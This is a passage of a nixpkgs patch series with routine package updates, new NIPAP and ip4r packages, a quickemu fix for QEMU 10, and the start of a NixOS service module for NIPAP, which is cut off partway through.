From 4f8dacc1998d4b52c945b2367a93bf91b17be4b6 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Sandro=20J=C3=A4ckel?=
Date: Mon, 16 Jun 2025 00:15:06 +0200
Subject: [PATCH 01/73] libblake3: split dev outputs from runtime

---
 pkgs/by-name/li/libblake3/package.nix | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/pkgs/by-name/li/libblake3/package.nix b/pkgs/by-name/li/libblake3/package.nix
index 72ce99baa6bc..439634017266 100644
--- a/pkgs/by-name/li/libblake3/package.nix
+++ b/pkgs/by-name/li/libblake3/package.nix
@@ -13,6 +13,11 @@ stdenv.mkDerivation (finalAttrs: {
   pname = "libblake3";
   version = "1.8.2";
 
+  outputs = [
+    "out"
+    "dev"
+  ];
+
   src = fetchFromGitHub {
     owner = "BLAKE3-team";
     repo = "BLAKE3";

From 00eae402c32eb23a7be320a9bbb40d2021befd82 Mon Sep 17 00:00:00 2001
From: Yann Hamdaoui
Date: Mon, 16 Jun 2025 17:16:39 +0200
Subject: [PATCH 02/73] Add yannham to the maintainer list

---
 maintainers/maintainer-list.nix | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/maintainers/maintainer-list.nix b/maintainers/maintainer-list.nix
index 4ca444cecfd5..7f2e1acd7d99 100644
--- a/maintainers/maintainer-list.nix
+++ b/maintainers/maintainer-list.nix
@@ -27363,6 +27363,11 @@
     github = "yanganto";
     githubId = 10803111;
   };
+  yannham = {
+    github = "yannham";
+    githubId = 6530104;
+    name = "Yann Hamdaoui";
+  };
   yannickulrich = {
     email = "yannick.ulrich@proton.me";
     github = "yannickulrich";

From c7082db884a50d425c1c07bf871fef6a07a12d87 Mon Sep 17 00:00:00 2001
From: Yann Hamdaoui
Date: Mon, 16 Jun 2025 17:17:39 +0200
Subject: [PATCH 03/73] nickel: add yannham to maintainers

---
 pkgs/by-name/ni/nickel/package.nix | 1 +
 1 file changed, 1 insertion(+)

diff --git a/pkgs/by-name/ni/nickel/package.nix b/pkgs/by-name/ni/nickel/package.nix
index 5435356e206e..c60a028d5388 100644
--- a/pkgs/by-name/ni/nickel/package.nix
+++ b/pkgs/by-name/ni/nickel/package.nix
@@ -99,6 +99,7 @@ rustPlatform.buildRustPackage (finalAttrs: {
     maintainers = with lib.maintainers; [
       felschr
       matthiasbeyer
+      yannham
     ];
     mainProgram = "nickel";
   };

From 1713262d28c814f3f01bb461718d1534fbdc82c3 Mon Sep 17 00:00:00 2001
From: Yann Hamdaoui
Date: Mon, 16 Jun 2025 17:18:47 +0200
Subject: [PATCH 04/73] nickel: disable nix feature by default

See https://github.com/tweag/nickel/issues/2284
---
 pkgs/by-name/ni/nickel/package.nix | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/pkgs/by-name/ni/nickel/package.nix b/pkgs/by-name/ni/nickel/package.nix
index c60a028d5388..e9ce620603ef 100644
--- a/pkgs/by-name/ni/nickel/package.nix
+++ b/pkgs/by-name/ni/nickel/package.nix
@@ -9,7 +9,7 @@
   pkg-config,
   nixVersions,
   nix-update-script,
-  enableNixImport ? true,
+  enableNixImport ? false,
 }:
 
 rustPlatform.buildRustPackage (finalAttrs: {

From e0ec68aee570cc84a402ad9ed66327ac51c0438f Mon Sep 17 00:00:00 2001
From: Yann Hamdaoui
Date: Mon, 16 Jun 2025 17:19:35 +0200
Subject: [PATCH 05/73] nickel: 1.11.0 -> 1.12.0

---
 pkgs/by-name/ni/nickel/package.nix | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/pkgs/by-name/ni/nickel/package.nix b/pkgs/by-name/ni/nickel/package.nix
index e9ce620603ef..556b4cfdb6f0 100644
--- a/pkgs/by-name/ni/nickel/package.nix
+++ b/pkgs/by-name/ni/nickel/package.nix
@@ -14,17 +14,17 @@
 
 rustPlatform.buildRustPackage (finalAttrs: {
   pname = "nickel";
-  version = "1.11.0";
+  version = "1.12.0";
 
   src = fetchFromGitHub {
     owner = "tweag";
     repo = "nickel";
     tag = finalAttrs.version;
-    hash = "sha256-I7cLVrkJhB3aJeE/A3tpFEUj0AkvcONSXD8NtnE5eQ0=";
+    hash = "sha256-iKLjYE4uT+luIRXjEuO7KjgkO+/jFpLjhCI5tO7TVMM=";
   };
 
   useFetchCargoVendor = true;
-  cargoHash = "sha256-DzSfwBVeRT/GAXWyZKZjlDvj95bQzrkqIgZZ2EZw7eQ=";
+  cargoHash = "sha256-O/iat0JOvA90LD+ngAByLYQyd1VBeoa8yj7/NdEYprE=";
 
   cargoBuildFlags = [
     "-p nickel-lang-cli"

From ace78c7d30d96f37f1480ede7ba6afa0d3cb41d9 Mon Sep 17 00:00:00 2001
From: Ryan Omasta
Date: Sat, 21 Jun 2025 05:58:23 -0600
Subject: [PATCH 06/73] gitea: 1.24.0 -> 1.24.2

https://github.com/go-gitea/gitea/releases/tag/v1.24.2

Diff: https://github.com/go-gitea/gitea/compare/v1.24.0...v1.24.2
---
 pkgs/by-name/gi/gitea/package.nix | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/pkgs/by-name/gi/gitea/package.nix b/pkgs/by-name/gi/gitea/package.nix
index e7c6f0a02568..a4237f3685f2 100644
--- a/pkgs/by-name/gi/gitea/package.nix
+++ b/pkgs/by-name/gi/gitea/package.nix
@@ -35,18 +35,18 @@ let
 in
 buildGoModule rec {
   pname = "gitea";
-  version = "1.24.0";
+  version = "1.24.2";
 
   src = fetchFromGitHub {
     owner = "go-gitea";
     repo = "gitea";
     tag = "v${gitea.version}";
-    hash = "sha256-lKeqoNL6RMjhm9egk6upbovJaWwm3r2kxi0Z9bjNxtI=";
+    hash = "sha256-NQSilSF/W69j1qEYYmlQfu2T0OefB+8yf9rCHAL8a6c=";
   };
 
   proxyVendor = true;
 
-  vendorHash = "sha256-nC8y3skBhnOo7Ki9nc7Ni6UpheArB8bGK4AR/1Gdjr0=";
+  vendorHash = "sha256-VmlF86Sv6R2NmCtWi4kZ4rfmFAjgMB1RU/1jmnPiIkw=";
 
   outputs = [
     "out"

From bed132b2edf544eddd12111a4332415def230e73 Mon Sep 17 00:00:00 2001
From: Luke Granger-Brown
Date: Sun, 15 Jun 2025 17:13:43 +0100
Subject: [PATCH 07/73] flask-xml-rpc-re: init at v0.2.0

---
 .../flask-xml-rpc-re/default.nix              | 48 +++++++++++++++++++
 pkgs/top-level/python-packages.nix            |  2 +
 2 files changed, 50 insertions(+)
 create mode 100644 pkgs/development/python-modules/flask-xml-rpc-re/default.nix

diff --git a/pkgs/development/python-modules/flask-xml-rpc-re/default.nix b/pkgs/development/python-modules/flask-xml-rpc-re/default.nix
new file mode 100644
index 000000000000..ed85b18fab09
--- /dev/null
+++ b/pkgs/development/python-modules/flask-xml-rpc-re/default.nix
@@ -0,0 +1,48 @@
+{
+  lib,
+  buildPythonPackage,
+  fetchFromGitHub,
+  setuptools,
+  flask,
+  nose2,
+}:
+
+buildPythonPackage rec {
+  pname = "flask-xml-rpc-re";
+  version = "0.2.0";
+
+  src = fetchFromGitHub {
+    owner = "Croydon";
+    repo = "flask-xml-rpc-reloaded";
+    tag = version;
+    hash = "sha256-S+9Ur22ExgVjKMOKG19cBz2aCVdEyOoS7uoz17CDzd8=";
+  };
+
+  build-system = [
+    setuptools
+  ];
+
+  dependencies = [
+    flask
+  ];
+
+  nativeCheckInputs = [
+    nose2
+  ];
+
+  checkPhase = ''
+    nose2 -v
+  '';
+
+  pythonImportsCheck = [ "flask_xmlrpcre" ];
+
+  meta = {
+    description = "Let your Flask apps provide XML-RPC APIs";
+    license = lib.licenses.mit;
+    maintainers = with lib.maintainers; [
+      lukegb
+    ];
+    homepage = "https://github.com/Croydon/flask-xml-rpc-reloaded";
+    changelog = "https://github.com/Croydon/flask-xml-rpc-reloaded/releases/tag/${version}";
+  };
+}
diff --git a/pkgs/top-level/python-packages.nix b/pkgs/top-level/python-packages.nix
index 1b091dda03be..55a1932550d1 100644
--- a/pkgs/top-level/python-packages.nix
+++ b/pkgs/top-level/python-packages.nix
@@ -5232,6 +5232,8 @@ self: super: with self; {
 
   flask-wtf = callPackage ../development/python-modules/flask-wtf { };
 
+  flask-xml-rpc-re = callPackage ../development/python-modules/flask-xml-rpc-re { };
+
   flatbencode = callPackage ../development/python-modules/flatbencode { };
 
   flatbuffers = callPackage ../development/python-modules/flatbuffers { inherit (pkgs) flatbuffers; };

From 39b9409d1a178a68fa844c6b80c48d8bf4c14354 Mon Sep 17 00:00:00 2001
From: Luke Granger-Brown
Date: Sun, 15 Jun 2025 17:13:58 +0100
Subject: [PATCH 08/73] nipap: init at v0.32.7

This is both a Python module and an application, so it's inited as a
Python module per the nixpkgs manual, and then translated into an
application inside by-name.
---
 pkgs/by-name/ni/nipap/package.nix             |   5 +
 .../python-modules/nipap/default.nix          | 100 ++++++++++++++++++
 pkgs/top-level/python-packages.nix            |   2 +
 3 files changed, 107 insertions(+)
 create mode 100644 pkgs/by-name/ni/nipap/package.nix
 create mode 100644 pkgs/development/python-modules/nipap/default.nix

diff --git a/pkgs/by-name/ni/nipap/package.nix b/pkgs/by-name/ni/nipap/package.nix
new file mode 100644
index 000000000000..ba60b802d831
--- /dev/null
+++ b/pkgs/by-name/ni/nipap/package.nix
@@ -0,0 +1,5 @@
+{
+  python3Packages,
+}:
+
+python3Packages.toPythonApplication python3Packages.nipap
diff --git a/pkgs/development/python-modules/nipap/default.nix b/pkgs/development/python-modules/nipap/default.nix
new file mode 100644
index 000000000000..d124306df59c
--- /dev/null
+++ b/pkgs/development/python-modules/nipap/default.nix
@@ -0,0 +1,100 @@
+{
+  lib,
+  buildPythonPackage,
+  fetchFromGitHub,
+
+  # build deps
+  setuptools,
+  docutils,
+
+  # dependencies
+  zipp,
+  importlib-metadata,
+  flask,
+  flask-compress,
+  flask-xml-rpc-re,
+  flask-restx,
+  requests,
+  ipy,
+  # indirect deps omitted: jinja2/markupsafe/werkzeug,
+  parsedatetime,
+  psutil,
+  psycopg2,
+  pyparsing,
+  python-dateutil,
+  pytz,
+  pyjwt,
+  tornado,
+
+  # optional deps
+  ## ldap
+  python-ldap,
+}:
+
+buildPythonPackage rec {
+  pname = "nipap";
+  version = "0.32.7";
+  pyproject = true;
+
+  src = fetchFromGitHub {
+    owner = "SpriteLink";
+    repo = "NIPAP";
+    tag = "v${version}";
+    hash = "sha256-FnCHW/yEhWtx+2fU+G6vxz50lWC7WL3cYKYOQzmH8zs=";
+  };
+
+  sourceRoot = "${src.name}/nipap";
+
+  pythonRelaxDeps = true; # deps are tightly specified by upstream
+
+  postPatch = ''
+    substituteInPlace pyproject.toml \
+      --replace-fail 'docutils==0.20.1' 'docutils'
+  '';
+
+  build-system = [
+    setuptools
+    docutils
+  ];
+
+  dependencies = [
+    zipp
+    importlib-metadata
+    flask
+    flask-compress
+    flask-xml-rpc-re
+    flask-restx
+    requests
+    ipy
+    # indirect deps omitted: jinja2/markupsafe/werkzeug
+    parsedatetime
+    psutil
+    psycopg2
+    pyparsing
+    python-dateutil
+    pytz
+    pyjwt
+    tornado
+  ];
+
+  optional-dependencies = {
+    ldap = [ python-ldap ];
+  };
+
+  doCheck = false; # tests require nose, /etc/nipap/nipap.conf and a running nipapd
+
+  meta = {
+    description = "Neat IP Address Planner";
+    longDescription = ''
+      NIPAP is the best open source IPAM in the known universe,
+      challenging classical IP address management (IPAM) systems in many areas.
+    '';
+    homepage = "https://github.com/SpriteLink/NIPAP";
+    changelog = "https://github.com/SpriteLink/NIPAP/releases/tag/v${version}";
+    license = lib.licenses.mit;
+    maintainers = with lib.maintainers; [
+      lukegb
+    ];
+    platforms = lib.platforms.all;
+  };
+}
diff --git a/pkgs/top-level/python-packages.nix b/pkgs/top-level/python-packages.nix
index 55a1932550d1..ecf0477f3785 100644
--- a/pkgs/top-level/python-packages.nix
+++ b/pkgs/top-level/python-packages.nix
@@ -10204,6 +10204,8 @@ self: super: with self; {
 
   ninja = callPackage ../development/python-modules/ninja { inherit (pkgs) ninja; };
 
+  nipap = callPackage ../development/python-modules/nipap { };
+
   nipreps-versions = callPackage ../development/python-modules/nipreps-versions { };
 
   nipy = callPackage ../development/python-modules/nipy { };

From 8071d341875c47d1eeb5d8cd08600a2fdd98373a Mon Sep 17 00:00:00 2001
From: Luke Granger-Brown
Date: Sun, 15 Jun 2025 17:39:08 +0100
Subject: [PATCH 09/73] pynipap: init at 0.32.7

---
 .../python-modules/pynipap/default.nix        | 38 +++++++++++++++++++
 pkgs/top-level/python-packages.nix            |  2 +
 2 files changed, 40 insertions(+)
 create mode 100644 pkgs/development/python-modules/pynipap/default.nix

diff --git a/pkgs/development/python-modules/pynipap/default.nix b/pkgs/development/python-modules/pynipap/default.nix
new file mode 100644
index 000000000000..ee263f83210e
--- /dev/null
+++ b/pkgs/development/python-modules/pynipap/default.nix
@@ -0,0 +1,38 @@
+{
+  lib,
+  buildPythonPackage,
+  nipap,
+
+  # build deps
+  setuptools,
+}:
+
+buildPythonPackage rec {
+  pname = "pynipap";
+  pyproject = true;
+
+  inherit (nipap) version src;
+
+  sourceRoot = "${src.name}/pynipap";
+
+  build-system = [
+    setuptools
+  ];
+
+  doCheck = false; # tests require nose, /etc/nipap/nipap.conf and a running nipapd
+
+  meta = {
+    description = "Python client library for Neat IP Address Planner";
+    longDescription = ''
+      NIPAP is the best open source IPAM in the known universe,
+      challenging classical IP address management (IPAM) systems in many areas.
+    '';
+    homepage = "https://github.com/SpriteLink/NIPAP";
+    changelog = "https://github.com/SpriteLink/NIPAP/releases/tag/v${version}";
+    license = lib.licenses.mit;
+    maintainers = with lib.maintainers; [
+      lukegb
+    ];
+    platforms = lib.platforms.all;
+  };
+}
diff --git a/pkgs/top-level/python-packages.nix b/pkgs/top-level/python-packages.nix
index ecf0477f3785..ccc4b1e63ea6 100644
--- a/pkgs/top-level/python-packages.nix
+++ b/pkgs/top-level/python-packages.nix
@@ -13141,6 +13141,8 @@ self: super: with self; {
 
   pynina = callPackage ../development/python-modules/pynina { };
 
+  pynipap = callPackage ../development/python-modules/pynipap { };
+
   pynisher = callPackage ../development/python-modules/pynisher { };
 
   pynitrokey = callPackage ../development/python-modules/pynitrokey { };

From 4abad970d7d207d04dddc8e648503e082ca22c6b Mon Sep 17 00:00:00 2001
From: Luke Granger-Brown
Date: Sun, 15 Jun 2025 17:43:14 +0100
Subject: [PATCH 10/73] nipap-cli: init at 0.32.7

---
 pkgs/by-name/ni/nipap-cli/package.nix | 53 +++++++++++++++++++++++++++
 1 file changed, 53 insertions(+)
 create mode 100644 pkgs/by-name/ni/nipap-cli/package.nix

diff --git a/pkgs/by-name/ni/nipap-cli/package.nix b/pkgs/by-name/ni/nipap-cli/package.nix
new file mode 100644
index 000000000000..4568bfe13755
--- /dev/null
+++ b/pkgs/by-name/ni/nipap-cli/package.nix
@@ -0,0 +1,53 @@
+{
+  lib,
+  python312Packages,
+}:
+
+let
+  python3Packages = python312Packages;
+in
+python3Packages.buildPythonApplication rec {
+  pname = "nipap-cli";
+  inherit (python3Packages.nipap) version src;
+  pyproject = true;
+
+  sourceRoot = "${src.name}/nipap-cli";
+
+  postPatch = ''
+    substituteInPlace pyproject.toml \
+      --replace-fail 'docutils==0.20.1' 'docutils'
+  '';
+
+  build-system = with python3Packages; [
+    setuptools
+    docutils
+  ];
+
+  dependencies = with python3Packages; [
+    ipy
+    pynipap
+  ];
+
+  checkInputs = with python3Packages; [
+    pythonImportsCheckHook
+  ];
+  pythonImportsCheck = [
+    "nipap_cli.nipap_cli"
+  ];
+
+  meta = {
+    description = "Neat IP Address Planner CLI";
+    longDescription = ''
+      NIPAP is the best open source IPAM in the known universe,
+      challenging classical IP address management (IPAM) systems in many areas.
+    '';
+    homepage = "https://github.com/SpriteLink/NIPAP";
+    changelog = "https://github.com/SpriteLink/NIPAP/releases/tag/v${version}";
+    license = lib.licenses.mit;
+    maintainers = with lib.maintainers; [
+      lukegb
+    ];
+    platforms = lib.platforms.all;
+    mainProgram = "nipap";
+  };
+}

From 9c9c3642f0c96aa81319e620b7233d84ba9da746 Mon Sep 17 00:00:00 2001
From: Luke Granger-Brown
Date: Sun, 15 Jun 2025 17:51:25 +0100
Subject: [PATCH 11/73] nipap-www: init at 0.32.7

---
 pkgs/by-name/ni/nipap-www/package.nix | 51 +++++++++++++++++++++++++++
 1 file changed, 51 insertions(+)
 create mode 100644 pkgs/by-name/ni/nipap-www/package.nix

diff --git a/pkgs/by-name/ni/nipap-www/package.nix b/pkgs/by-name/ni/nipap-www/package.nix
new file mode 100644
index 000000000000..33355ce94a28
--- /dev/null
+++ b/pkgs/by-name/ni/nipap-www/package.nix
@@ -0,0 +1,51 @@
+{
+  lib,
+  python3Packages,
+}:
+
+python3Packages.buildPythonApplication rec {
+  pname = "nipap-www";
+  inherit (python3Packages.nipap) version src;
+  pyproject = true;
+
+  sourceRoot = "${src.name}/nipap-www";
+
+  postPatch = ''
+    # Load Flask config additionally from FLASK_ environment variables.
+    # This makes providing secrets easier.
+    sed -i nipapwww/__init__.py \
+      -e '/^\s*app =/a\    app.config.from_prefixed_env()'
+  '';
+
+  pythonRelaxDeps = true; # deps are tightly specified
+
+  build-system = with python3Packages; [
+    setuptools
+  ];
+
+  dependencies = with python3Packages; [
+    flask
+    nipap
+    pynipap
+  ];
+
+  passthru = {
+    inherit (python3Packages) gunicorn python;
+    pythonPath = python3Packages.makePythonPath dependencies;
+  };
+
+  meta = {
+    description = "Neat IP Address Planner web UI";
+    longDescription = ''
+      NIPAP is the best open source IPAM in the known universe,
+      challenging classical IP address management (IPAM) systems in many areas.
+    '';
+    homepage = "https://github.com/SpriteLink/NIPAP";
+    changelog = "https://github.com/SpriteLink/NIPAP/releases/tag/v${version}";
+    license = lib.licenses.mit;
+    maintainers = with lib.maintainers; [
+      lukegb
+    ];
+    platforms = lib.platforms.all;
+  };
+}

From 5a0374e20e3377e95725c15eb304fe073ba72349 Mon Sep 17 00:00:00 2001
From: Luke Granger-Brown
Date: Sun, 15 Jun 2025 18:31:07 +0100
Subject: [PATCH 12/73] postgresqlPackages.ip4r: init at 2.4.2

---
 pkgs/servers/sql/postgresql/ext/ip4r.nix | 35 ++++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 pkgs/servers/sql/postgresql/ext/ip4r.nix

diff --git a/pkgs/servers/sql/postgresql/ext/ip4r.nix b/pkgs/servers/sql/postgresql/ext/ip4r.nix
new file mode 100644
index 000000000000..277ec10618a6
--- /dev/null
+++ b/pkgs/servers/sql/postgresql/ext/ip4r.nix
@@ -0,0 +1,35 @@
+{
+  fetchFromGitHub,
+  gitUpdater,
+  lib,
+  postgresql,
+  postgresqlBuildExtension,
+  postgresqlTestExtension,
+}:
+
+postgresqlBuildExtension (finalAttrs: {
+  pname = "ip4r";
+  version = "2.4.2";
+
+  src = fetchFromGitHub {
+    owner = "RhodiumToad";
+    repo = "ip4r";
+    tag = "${finalAttrs.version}";
+    hash = "sha256-3chAD4f4A6VlXVSI0kfC/ANcnFy4vBp4FZpT6QRAueQ=";
+  };
+
+  passthru.tests = {
+    extension = postgresqlTestExtension {
+      inherit (finalAttrs) finalPackage;
+      sql = "CREATE EXTENSION ip4r;";
+    };
+  };
+
+  meta = {
+    description = "IPv4/v6 and IPv4/v6 range index type for PostgreSQL";
+    homepage = "https://github.com/RhodiumToad/ip4r";
+    license = lib.licenses.postgresql;
+    maintainers = with lib.maintainers; [ lukegb ];
+    inherit (postgresql.meta) platforms;
+  };
+})

From 3dd6e7500a1127f0e09e05d39124a443d1db1993 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Robert=20Sch=C3=BCtz?=
Date: Sun, 22 Jun 2025 16:38:25 -0700
Subject: [PATCH 13/73] quickemu: correctly handle version 10.0.0 of QEMU

---
 pkgs/by-name/qu/quickemu/package.nix | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/pkgs/by-name/qu/quickemu/package.nix b/pkgs/by-name/qu/quickemu/package.nix
index fcbc23b9bdf1..5b0c4417bfe0 100644
--- a/pkgs/by-name/qu/quickemu/package.nix
+++ b/pkgs/by-name/qu/quickemu/package.nix
@@ -1,6 +1,7 @@
 {
   lib,
   fetchFromGitHub,
+  fetchpatch,
   stdenv,
   makeWrapper,
   gitUpdater,
@@ -67,6 +68,14 @@ stdenv.mkDerivation (finalAttrs: {
     hash = "sha256-sCoCcN6950pH33bRZsLoLc1oSs5Qfpj9Bbywn/uA6Bc=";
   };
 
+  patches = [
+    (fetchpatch {
+      name = "correctly-handle-version-10.0.0-of-qemu.patch";
+      url = "https://github.com/quickemu-project/quickemu/commit/f25205f4513c4fa72be6940081c62e613d1fddc6.patch";
+      hash = "sha256-OAXGyhMVDwbUypEPj/eRnH0wZYaL9WLGjbyoobe20UY=";
+    })
+  ];
+
   postPatch = ''
     sed -i \
       -e '/OVMF_CODE_4M.secboot.fd/s|ovmfs=(|ovmfs=("${OVMFFull.firmware}","${OVMFFull.variables}" |' \

From 18f89bfb370f5a496fd2a4cac5d497e87a6a81f4 Mon Sep 17 00:00:00 2001
From: "R. Ryantm"
Date: Mon, 23 Jun 2025 17:23:08 +0000
Subject: [PATCH 14/73] firefly-iii: 6.2.17 -> 6.2.18

---
 pkgs/by-name/fi/firefly-iii/package.nix | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/pkgs/by-name/fi/firefly-iii/package.nix b/pkgs/by-name/fi/firefly-iii/package.nix
index 005f8b172f2f..172d5445f65b 100644
--- a/pkgs/by-name/fi/firefly-iii/package.nix
+++ b/pkgs/by-name/fi/firefly-iii/package.nix
@@ -13,13 +13,13 @@
 
 stdenvNoCC.mkDerivation (finalAttrs: {
   pname = "firefly-iii";
-  version = "6.2.17";
+  version = "6.2.18";
 
   src = fetchFromGitHub {
     owner = "firefly-iii";
     repo = "firefly-iii";
     tag = "v${finalAttrs.version}";
-    hash = "sha256-g/mGCc7JxfWrbrh14OXaKgn0rjf4RMNL2NI4GzrphaY=";
+    hash = "sha256-QQlfUbDanyj3n0EOhPxfMqsrl9laQq2CQbwRY4/gH8k=";
   };
 
   buildInputs = [ php84 ];
@@ -38,13 +38,13 @@ stdenvNoCC.mkDerivation (finalAttrs: {
     composerNoScripts = true;
     composerStrictValidation = true;
     strictDeps = true;
-    vendorHash = "sha256-2GvBlKRTqehD7eVpEGd9zBoiom30DRMqatyHNF4eDiU=";
+    vendorHash = "sha256-h/DWKOlffEBWZhdf5iQf4f33IK+1Ie289Oqjb7GHfVY=";
   };
 
   npmDeps = fetchNpmDeps {
     inherit (finalAttrs) src;
     name = "${finalAttrs.pname}-npm-deps";
-    hash = "sha256-uZluWsHpbD2lMG/yNoZxry5X+Hiv3z/H4KqV7pydu/A=";
+    hash = "sha256-YbMUM+fXIuXVrv7QMlPklct3mDHI05PoOW+fgHf8c3I=";
  };
 
   preInstall = ''

From a013d9258c510d8660e64aaf1200946864959d6a Mon Sep 17 00:00:00 2001
From: Luke Granger-Brown
Date: Sun, 15 Jun 2025 20:04:30 +0100
Subject: [PATCH 15/73] nixos/nipap: init

---
 .../manual/release-notes/rl-2511.section.md   |   2 +
 nixos/modules/module-list.nix                 |   1 +
 nixos/modules/services/web-apps/nipap.nix     | 331 ++++++++++++++++++
 .../flask-xml-rpc-re/default.nix              |   4 +-
 pkgs/servers/sql/postgresql/ext/ip4r.nix      |   1 -
 5 files changed, 337 insertions(+), 2 deletions(-)
 create mode 100644 nixos/modules/services/web-apps/nipap.nix

diff --git a/nixos/doc/manual/release-notes/rl-2511.section.md b/nixos/doc/manual/release-notes/rl-2511.section.md
index 295d9ede7118..68cb1da77d91 100644
--- a/nixos/doc/manual/release-notes/rl-2511.section.md
+++ b/nixos/doc/manual/release-notes/rl-2511.section.md
@@ -40,6 +40,8 @@
 
 - [Szurubooru](https://github.com/rr-/szurubooru), an image board engine inspired by services such as Danbooru, dedicated for small and medium communities. Available as [services.szurubooru](#opt-services.szurubooru.enable).
 
+- The [Neat IP Address Planner](https://spritelink.github.io/NIPAP/) (NIPAP) can now be enabled through [services.nipap.enable](#opt-services.nipap.enable).
+
 - [nix-store-veritysetup](https://github.com/nikstur/nix-store-veritysetup-generator), a systemd generator to unlock the Nix Store as a dm-verity protected block device. Available as [boot.initrd.nix-store-veritysetup](options.html#opt-boot.initrd.nix-store-veritysetup.enable).
 
 - [SuiteNumérique Docs](https://github.com/suitenumerique/docs), a collaborative note taking, wiki and documentation web platform and alternative to Notion or Outline. Available as [services.lasuite-docs](#opt-services.lasuite-docs.enable).
diff --git a/nixos/modules/module-list.nix b/nixos/modules/module-list.nix
index 036490c9589a..7e14a5e809b5 100644
--- a/nixos/modules/module-list.nix
+++ b/nixos/modules/module-list.nix
@@ -1617,6 +1617,7 @@
   ./services/web-apps/nextjs-ollama-llm-ui.nix
   ./services/web-apps/nexus.nix
   ./services/web-apps/nifi.nix
+  ./services/web-apps/nipap.nix
   ./services/web-apps/node-red.nix
   ./services/web-apps/nostr-rs-relay.nix
   ./services/web-apps/ocis.nix
diff --git a/nixos/modules/services/web-apps/nipap.nix b/nixos/modules/services/web-apps/nipap.nix
new file mode 100644
index 000000000000..3a8e082ad037
--- /dev/null
+++ b/nixos/modules/services/web-apps/nipap.nix
@@ -0,0 +1,331 @@
+{
+  config,
+  lib,
+  pkgs,
+  ...
+}:
+
+let
+  cfg = config.services.nipap;
+  iniFmt = pkgs.formats.ini { };
+
+  configFile = iniFmt.generate "nipap.conf" cfg.settings;
+
+  defaultUser = "nipap";
+  defaultAuthBackend = "local";
+  dataDir = "/var/lib/nipap";
+
+  defaultServiceConfig = {
+    WorkingDirectory = dataDir;
+    User = cfg.user;
+    Group = config.users.users."${cfg.user}".group;
+    Restart = "on-failure";
+    RestartSec = 30;
+  };
+
+  escapedHost = host: if lib.hasInfix ":" host then "[${host}]" else host;
+in
+{
+  options.services.nipap = {
+    enable = lib.mkEnableOption "global Neat IP Address Planner (NIPAP) configuration";
+
+    user = lib.mkOption {
+      type = lib.types.str;
+      description = "User to use for running NIPAP services.";
+      default = defaultUser;
+    };
+
+    settings = lib.mkOption {
+      description = ''
+        Configuration options to set in /etc/nipap/nipap.conf.
+      '';
+
+      default = { };
+
+      type = lib.types.submodule {
+        freeformType = iniFmt.type;
+
+        options = {
+          nipapd = {
+            listen = lib.mkOption {
+              type = lib.types.str;
+              default = "::1";
+              description = "IP address to bind nipapd to.";
+            };
+            port = lib.mkOption {
+              type = lib.types.port;
+              default = 1337;
+              description = "Port to bind nipapd to.";
+            };
+
+            foreground = lib.mkOption {
+              type = lib.types.bool;
+              default = true;
+              description = "Remain in foreground rather than forking to background.";
+            };
+            debug = lib.mkOption {
+              type = lib.types.bool;
+              default = false;
+              description = "Enable debug logging.";
+            };
+
+            db_host = lib.mkOption {
+              type = lib.types.str;
+              default = "";
+              description = "PostgreSQL host to connect to. Empty means use UNIX socket.";
+            };
+            db_name = lib.mkOption {
+              type = lib.types.str;
+              default = cfg.user;
+              defaultText = defaultUser;
+              description = "Name of database to use on PostgreSQL server.";
+            };
+          };
+
+          auth = {
+            default_backend = lib.mkOption {
+              type = lib.types.str;
+              default = defaultAuthBackend;
+              description = "Name of auth backend to use by default.";
+            };
+            auth_cache_timeout = lib.mkOption {
+              type = lib.types.int;
+              default = 3600;
+              description = "Seconds to store cached auth entries for.";
+            };
+          };
+        };
+      };
+    };
+
+    authBackendSettings = lib.mkOption {
+      description = ''
+        auth.backends options to set in /etc/nipap/nipap.conf.
+      '';
+
+      default = {
+        "${defaultAuthBackend}" = {
+          type = "SqliteAuth";
+          db_path = "${dataDir}/local_auth.db";
+        };
+      };
+
+      type = lib.types.submodule {
+        freeformType = iniFmt.type;
+      };
+    };
+
+    nipapd = {
+      enable = lib.mkEnableOption "nipapd server";
+      package = lib.mkPackageOption pkgs "nipap" { };
+
+      database.createLocally = lib.mkOption {
+        type = lib.types.bool;
+        default = true;
+        description = "Create a nipap database automatically.";
+      };
+    };
+
+    nipap-www = {
+      enable = lib.mkEnableOption "nipap-www server";
+      package = lib.mkPackageOption pkgs "nipap-www" { };
+
+      xmlrpcURIFile = lib.mkOption {
+        type = lib.types.nullOr lib.types.path;
+        default = null;
+        description = "Path to file containing XMLRPC URI for use by web UI - this is a secret, since it contains auth credentials. If null, it will be initialized assuming that the auth database is local.";
+      };
+
+      workers = lib.mkOption {
+        type = lib.types.int;
+        default = 4;
+        description = "Number of worker processes for Gunicorn to fork.";
+      };
+      umask = lib.mkOption {
+        type = lib.types.str;
+        default = "0";
+        description = "umask for files written by Gunicorn, including UNIX socket.";
+      };
+
+      unixSocket = lib.mkOption {
+        type = lib.types.nullOr lib.types.str;
+        default = null;
+        description = "Path to UNIX socket to bind to.";
+        example = "/run/nipap/nipap-www.sock";
+      };
+      host = lib.mkOption {
+        type = lib.types.nullOr lib.types.str;
+        default = "::";
+        description = "Host to bind to.";
+      };
+      port = lib.mkOption {
+        type = lib.types.nullOr lib.types.port;
+        default = 21337;
+        description = "Port to bind to.";
+      };
+    };
+  };
+
+  config = lib.mkIf cfg.enable (
+    lib.mkMerge [
+      {
+        systemd.tmpfiles.rules = [
+          "d '${dataDir}' - ${cfg.user} ${config.users.users."${cfg.user}".group} - -"
+        ];
+
+        environment.etc."nipap/nipap.conf" = {
+          source = configFile;
+        };
+
+        services.nipap.settings = lib.attrsets.mapAttrs' (name: value: {
+          name = "auth.backends.${name}";
+          inherit value;
+        }) cfg.authBackendSettings;
+
+        services.nipap.nipapd.enable = lib.mkDefault true;
+        services.nipap.nipap-www.enable = lib.mkDefault true;
+
+        environment.systemPackages = [
+          cfg.nipapd.package
+        ];
+      }
+      (lib.mkIf (cfg.user == defaultUser) {
+        users.users."${defaultUser}" = {
